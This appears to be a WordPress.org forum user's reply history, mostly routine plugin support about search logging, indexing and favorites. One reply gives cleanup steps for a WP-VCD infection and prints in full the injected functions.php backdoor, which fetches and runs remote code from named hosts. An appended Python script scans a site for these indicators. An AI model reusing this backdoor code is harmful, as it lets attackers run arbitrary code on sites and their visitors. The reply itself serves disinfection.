Forum Replies Created

Viewing 14 replies - 1 through 14 (of 14 total)
  • Thread Starter lfbender

    (@lfbender)

    Thank you for this.
    I am reviewing what custom fields I actually want people to be able to find and I will test your filter accordingly.

    For now my immediate issue has been answered and resolved.

    Thank you for the fast and thorough help.


    Thread Starter lfbender

    (@lfbender)

    Yes, I have also selected checkbox fields for indexing.

    I did not think it would be a problem.

    And yes, removing the checkbox fields from the indexed custom fields unstuck the process.

    Thank you.

    So just to know: there is no way to index checkbox custom fields right now?

    Thread Starter lfbender

    (@lfbender)

    Hi @takashimatsuyama and thanks for the answer.

    I am already using the custom template.

    Yes, I would be interested in only the number of saved posts for the user and to display that number on an archive page saying, “You have saved 3 favorites”.

    Thread Starter lfbender

    (@lfbender)

    FacetWP just came out with an update that includes a fix for this too (ver 3.8.1), so this works now.

    Thread Starter lfbender

    (@lfbender)

    Here is some more info from FacetWP support:

    When I look at the AJAX response, your site’s HTML header is getting injected into the response, causing the JSON to break. This is usually caused by some sort of output buffering that gets opened but not closed properly. I.e. also check for any custom uses of ob_start()…

    Thread Starter lfbender

    (@lfbender)

    The hook works now and I don’t have an explanation as to what changed. Might have been a caching issue.

    Thread Starter lfbender

    (@lfbender)

    The problem was a piece of bad JavaScript code I wrote.

    
         let mPoint = (document.createTextNode = point);
    

    I still find it interesting that the console error led me anywhere other than to the faulty line in my script.

    After fixing this, there were no more errors.

    Thread Starter lfbender

    (@lfbender)

    So, I noticed that the var_dump gave the strings with spaces. So I removed the spaces from the list of excludes, only leaving:

    user1,user2,user3

    (without any spaces), and now it seems to work.

    I would put a warning regarding this, to clarify that you need the list without spaces. Or just run the list through a regex replace or something.

    Thanks for the quick response and help!

    Thread Starter lfbender

    (@lfbender)

    It returns the list of excluded Users:
    array(7) { [0]=> string(3) "user1" [1]=> string(5) " user2" [2]=> string(7) " user2" [3]=> string(5) " user3" [4]=> string(6) " user4" [5]=> string(9) " user5" [6]=> string(7) " user6" } int(10) string(5) "user7" ?

    But the log still shows the searches…

    Thread Starter lfbender

    (@lfbender)

    Hi @msaari,

    I went to Relevanssi Search Options –> Logging –> Exclude users.

    I listed the user ids, like this:
    1, 2, 3, 4
    I saved.

    I went to the search form on my home page and did a search.

    Then I went to Dashboard –> User searches to check if my search showed up (I also excluded my user id) and it did.

    I repeated all the above using user names instead of user ids, with the same result.

    What did I miss?

    Thread Starter lfbender

    (@lfbender)

    @bcworkz Thank you. Although I didn’t use the exact way you have described, you helped me find a way that works. I used filenames and filepaths to identify if the PDF will have a different title or not and unlinked based on that. If it is just an update, it just overwrites the file, no unlinking needed; if it is a file with a new name, it deletes the old attachment.

    lfbender

    (@lfbender)

    I have the same issue.

    Thread Starter lfbender

    (@lfbender)

    So I managed to clean all my sites (7), so thank you @simplix.

    These are the steps I have taken (using also what @simplix wrote).

    At the very beginning of the functions.php in the affected theme, before anything else, was a whole block of code that looked like this:

    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '****random looking numbers****'))
    {
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {
    
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
    {
    
    if (!empty($_REQUEST['newdomain']))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
    {
    
    $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
    @file_put_contents(__FILE__, $file);
    print "true";
    }
    
    }
    }
    }
    break;
    
    case 'change_code';
    if (isset($_REQUEST['newcode']))
    {
    
    if (!empty($_REQUEST['newcode']))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
    {
    
    $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
    @file_put_contents(__FILE__, $file);
    print "true";
    }
    
    }
    }
    }
    break;
    
    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    
    die("");
    }
    
    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
    
    function file_get_contents_tcurl($url)
    {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
    }
    
    function theme_temp_setup($phpCode)
    {
    $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
    $handle   = fopen($tmpfname, "w+");
    if( fwrite($handle, "<?php\n" . $phpCode))
    {
    }
    else
    {
    $tmpfname = tempnam('./', "theme_temp_setup");
    $handle   = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    }
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
    }
    
    $wp_auth_key='12335f8c45ff73be536601a7562a3220';
    if (($tmpcontent = @file_get_contents("https://www.parors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.parors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    
    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    
    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }
    
    }
    }
    
    elseif ($tmpcontent = @file_get_contents("https://www.parors.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
    
    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    
    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }
    
    }
    } 
    
    elseif ($tmpcontent = @file_get_contents("https://www.parors.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
    
    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    
    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }
    
    }
    }
    elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    
    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent)); 
    
    } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent)); 
    
    } 
    
    }
    }
    
    //$start_wp_theme_tmp
    //wp_tmp
    //$end_wp_theme_tmp
    ?>

    I deleted this.

    Then I went into the wp-includes folder and deleted:
    wp-vcd.php
    wp-tmp.php
    wp-feed.php

    Then I went into phpMyAdmin for the database cleaning:

    I did a full database search for %bullgoesdown% and %wiilberedmodels% (these were the pages that the user was sent to, even though it is not the page you see when you see the redirect in action, because these sites are also only redirecting), which gave me probably every single post and page content. From this I saw the exact scripts and where the malware has made changes.

    I used the exact script to do what @simplix suggested for the post_content column of the wp_posts table. Then I found and changed the malware site addresses in wp_options.

    If you have a hard time finding initial data on what to look for, I used https://aw-snap.info, which has a tool for printing out the page’s code for analyzing. There you should be able to find the scripts that are used and keywords for the spammy domains.

    As a last step I deleted the wp-rocket cache, changed passwords, deleted unused themes and updated all plugins that were free.

    Hope this helps someone else too.

    • This reply was modified 5 years, 2 months ago by lfbender.
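
An added example, not part of the original reply: a Python scan of a WordPress tree for the indicators named in the post above (the three dropped file names and strings from the block injected into functions.php). The function names and the constructed sample tree are assumptions made for illustration.

```python
import os
import tempfile

# Indicators taken from the post above: files the poster deleted from
# wp-includes, and strings that appear in the injected functions.php block.
DROPPED_FILES = {"wp-vcd.php", "wp-tmp.php", "wp-feed.php"}
CODE_MARKERS = ("$div_code_name", "theme_temp_setup", "file_get_contents_tcurl",
                "//$start_wp_theme_tmp", "ERROR_WP_ACTION")

def scan_wordpress(root):
    """Return sorted (relative_path, reason) findings under a WordPress root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            # The pasted code also falls back to writing wp-tmp.php into the
            # theme directory, so the file names are flagged wherever they occur.
            if name in DROPPED_FILES:
                findings.append((rel, "dropped file"))
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            hits = [m for m in CODE_MARKERS if m in text]
            if hits:
                findings.append((rel, "markers: " + ", ".join(hits)))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample: a clean theme, an infected theme, one dropped file."""
    samples = {
        "wp-includes/wp-tmp.php": "<?php // constructed placeholder\n",
        "wp-includes/post.php": "<?php // constructed clean core file\n",
        "wp-content/themes/clean/functions.php": "<?php add_theme_support('x');\n",
        "wp-content/themes/bad/functions.php":
            "<?php\n$div_code_name=\"wp_vcd\";\n//$start_wp_theme_tmp\n",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, reason in scan_wordpress(tmp):
            print(f"{rel}: {reason}")
```

Point `scan_wordpress` at the site root or at a downloaded copy of it; each hit is a file to open and compare against a clean copy of the theme or of WordPress core.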
    Thread Starter lfbender

    (@lfbender)

    Thank you @simplix for this.

    I tried to follow your instructions as closely as possible and I found additional things in the database to correct. I didn’t however find anything for the guid and the postmeta.
    Which wouldn’t bother me, except the site’s behavior didn’t change, so there have to be other things. I now saw that I probably have other things in the files too, I just have no idea what to look for anymore.
    I cannot unfortunately update the plugins as wp-admin is still not accessible.
